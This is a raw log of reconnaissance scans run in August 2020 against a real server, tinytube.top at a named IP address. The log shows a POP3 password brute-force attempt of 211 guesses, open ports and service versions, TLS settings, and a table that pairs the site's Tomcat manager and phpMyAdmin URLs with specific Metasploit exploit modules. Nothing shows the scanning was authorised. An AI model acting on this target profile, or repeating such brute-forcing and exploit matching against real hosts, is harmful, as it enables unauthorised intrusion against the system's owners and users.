212.86.108.165 Welcome! __________________ VERSION ___________________ Name Versions Type Roundcube CMS phpMyAdmin CMS Apache 2.4.25 Platform ______________________________________________ Time: 78.5 sec Urls: 404 Fingerprints: 40401 ##################################################################################################################################### HTTP/1.1 200 OK Date: Thu, 27 Aug 2020 11:47:28 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 18 Aug 2020 13:31:05 GMT ETag: "c34-5ad26e6302e47" Accept-Ranges: bytes Content-Length: 3124 Vary: Accept-Encoding Content-Type: text/html HTTP/1.1 200 OK Date: Thu, 27 Aug 2020 11:47:28 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 18 Aug 2020 13:31:05 GMT ETag: "c34-5ad26e6302e47" Accept-Ranges: bytes Content-Length: 3124 Vary: Accept-Encoding Content-Type: text/html ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:47 EDT NSE: [pop3-brute] usernames: Time limit 3m00s exceeded. NSE: [pop3-brute] usernames: Time limit 3m00s exceeded. NSE: [pop3-brute] passwords: Time limit 3m00s exceeded. Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.22s latency). PORT STATE SERVICE VERSION 110/tcp open pop3 Dovecot pop3d | pop3-brute: | Accounts: No valid accounts found |_ Statistics: Performed 211 guesses in 183 seconds, average tps: 1.1 |_pop3-capabilities: SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) PIPELINING TOP CAPA AUTH-RESP-CODE STLS USER UIDL RESP-CODES Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%), Linux 4.2 (94%) No exact OS matches for host (test conditions non-ideal). Network Distance: 10 hops TRACEROUTE (using port 110/tcp) HOP RTT ADDRESS 1 92.45 ms 10.203.4.1 2 93.20 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 93.26 ms 37.120.220.20 5 89.67 ms xe-5-0-2.edge1.LosAngeles6.Level3.net (4.26.0.181) 6 239.13 ms ae-2-3204.edge7.Amsterdam1.Level3.net (4.69.162.181) 7 236.25 ms NOVOSERVE-B.edge7.Amsterdam1.Level3.net (213.19.200.70) 8 ... 9 236.27 ms adm-b6-link.telia.net (62.115.117.115) 10 241.95 ms tinytube.top (212.86.108.165) ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 07:50 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). PORT STATE SERVICE VERSION 123/tcp closed ntp 123/udp open ntp NTP v4 (unsynchronized) Too many fingerprints match this host to give specific OS details Network Distance: 9 hops TRACEROUTE (using port 123/tcp) HOP RTT ADDRESS 1 93.06 ms 10.203.4.1 2 89.67 ms vlan119.as16.lax1.us.m247.com (185.242.5.113) 3 ... 4 94.13 ms xe-2-3-0-0.bb2.lax1.us.m247.com (193.9.115.198) 5 92.93 ms xe-5-0-2.edge1.LosAngeles6.Level3.net (4.26.0.181) 6 148.01 ms ash-bb2-link.telia.net (62.115.121.221) 7 240.18 ms NOVOSERVE-B.edge7.Amsterdam1.Level3.net (213.19.200.70) 8 ... 9 236.78 ms tinytube.top (212.86.108.165) ##################################################################################################################################### Version: 2.0.0-static OpenSSL 1.1.1h-dev xx XXX xxxx Connected to 212.86.108.165 Testing SSL server 212.86.108.165 on port 443 using SNI name 212.86.108.165 SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 disabled TLS Fallback SCSV: Server supports TLS Fallback SCSV TLS renegotiation: Secure session renegotiation supported TLS Compression: Compression disabled Heartbleed: TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed Supported Server Cipher(s): Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits AES256-GCM-SHA384 Accepted TLSv1.2 256 bits AES256-SHA256 Accepted TLSv1.2 256 bits AES256-SHA Accepted TLSv1.2 128 bits AES128-GCM-SHA256 Accepted TLSv1.2 128 bits AES128-SHA256 Accepted TLSv1.2 128 bits AES128-SHA Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits AES256-SHA Accepted TLSv1.1 128 bits AES128-SHA Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits AES256-SHA Accepted TLSv1.0 128 bits AES128-SHA Server Key Exchange Group(s): TLSv1.2 141 bits sect283k1 TLSv1.2 141 bits sect283r1 TLSv1.2 204 bits sect409k1 TLSv1.2 204 bits sect409r1 TLSv1.2 285 bits sect571k1 TLSv1.2 285 bits sect571r1 TLSv1.2 128 bits secp256k1 TLSv1.2 128 bits secp256r1 (NIST P-256) TLSv1.2 192 bits secp384r1 (NIST P-384) TLSv1.2 260 bits secp521r1 (NIST P-521) TLSv1.2 128 bits brainpoolP256r1 TLSv1.2 192 bits brainpoolP384r1 TLSv1.2 256 bits brainpoolP512r1 Server Signature Algorithm(s): TLSv1.2 rsa_pkcs1_sha1 TLSv1.2 dsa_sha1 TLSv1.2 ecdsa_sha1 TLSv1.2 rsa_pkcs1_sha224 TLSv1.2 dsa_sha224 TLSv1.2 ecdsa_sha224 TLSv1.2 rsa_pkcs1_sha256 TLSv1.2 dsa_sha256 TLSv1.2 ecdsa_secp256r1_sha256 TLSv1.2 rsa_pkcs1_sha384 TLSv1.2 dsa_sha384 TLSv1.2 ecdsa_secp384r1_sha384 TLSv1.2 rsa_pkcs1_sha512 TLSv1.2 dsa_sha512 TLSv1.2 ecdsa_secp521r1_sha512 SSL Certificate: Signature Algorithm: sha256WithRSAEncryption RSA Key Strength: 2048 Subject: cum4k.xyz Issuer: cum4k.xyz Not valid before: Dec 29 16:48:29 2019 GMT Not valid after: Dec 28 16:48:29 2020 GMT ##################################################################################################################################### +---------------+--------------------------------------+--------------------------------------------------+-----------+-----------+ | App Name | URL to Application | Potential Exploit | Username | Password | +---------------+--------------------------------------+--------------------------------------------------+-----------+-----------+ | Apache Tomcat | https://212.86.108.165:1500/manager | ./exploits/multi/http/tomcat_mgr_upload.rb | | | | phpMyAdmin | http://212.86.108.165:80/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found | +---------------+--------------------------------------+--------------------------------------------------+-----------+-----------+ ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 08:00 EDT Nmap scan report for tinytube.top (212.86.108.165) Host is up (0.24s latency). Not shown: 65522 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b | ssl-cert: Subject: commonName=example.com/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:57:15 |_Not valid after: 2029-12-07T14:57:15 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 89:e2:fc:31:f3:d0:4d:b0:17:85:f9:83:ef:c3:cf:a4 (RSA) | 256 a9:72:e2:82:ba:05:fc:44:19:1d:9a:c3:15:c0:89:28 (ECDSA) |_ 256 3a:ca:80:35:34:89:6f:e5:f0:40:a3:10:e5:95:be:f7 (ED25519) 25/tcp open smtp Exim smtpd 4.89 | smtp-commands: tinytube.top Hello tinytube.top [185.242.5.119], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:54:54 |_Not valid after: 2029-12-07T14:54:54 |_ssl-date: 2020-08-27T12:05:11+00:00; -1m30s from scanner time. 53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Debian 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Tiny Tube 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: RESP-CODES PIPELINING CAPA AUTH-RESP-CODE USER SASL(PLAIN LOGIN DIGEST-MD5 CRAM-MD5) TOP UIDL STLS |_ssl-date: TLS randomness does not represent time 143/tcp open imap Dovecot imapd |_imap-capabilities: have AUTH=CRAM-MD5A0001 AUTH=LOGIN IMAP4rev1 SASL-IR listed STARTTLS more AUTH=PLAIN post-login capabilities Pre-login OK ID LITERAL+ IDLE AUTH=DIGEST-MD5 ENABLE LOGIN-REFERRALS |_ssl-date: TLS randomness does not represent time 443/tcp open ssl/http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Cum 4K | ssl-cert: Subject: commonName=cum4k.xyz/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-29T16:48:29 |_Not valid after: 2020-12-28T16:48:29 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 465/tcp open ssl/smtp Exim smtpd 4.89 |_smtp-commands: tinytube.top Hello tinytube.top [185.242.5.119], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, HELP, | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:54:54 |_Not valid after: 2029-12-07T14:54:54 |_ssl-date: 2020-08-27T12:03:52+00:00; -2m48s from scanner time. 587/tcp open smtp Exim smtpd 4.89 | smtp-commands: tinytube.top Hello tinytube.top [185.242.5.119], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | ssl-cert: Subject: commonName=tinytube/organizationName=XX/stateOrProvinceName=XX/countryName=XX | Not valid before: 2019-12-10T14:54:54 |_Not valid after: 2029-12-07T14:54:54 |_ssl-date: 2020-08-27T12:04:14+00:00; -2m27s from scanner time. 993/tcp open ssl/imaps? |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3s? |_ssl-date: TLS randomness does not represent time 1500/tcp open ssl/vlsi-lm? | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found | Content-Length: 2715 | Date: Thu, 27 Aug 2020 12:04:41 GMT | | | | 404 Not Found | |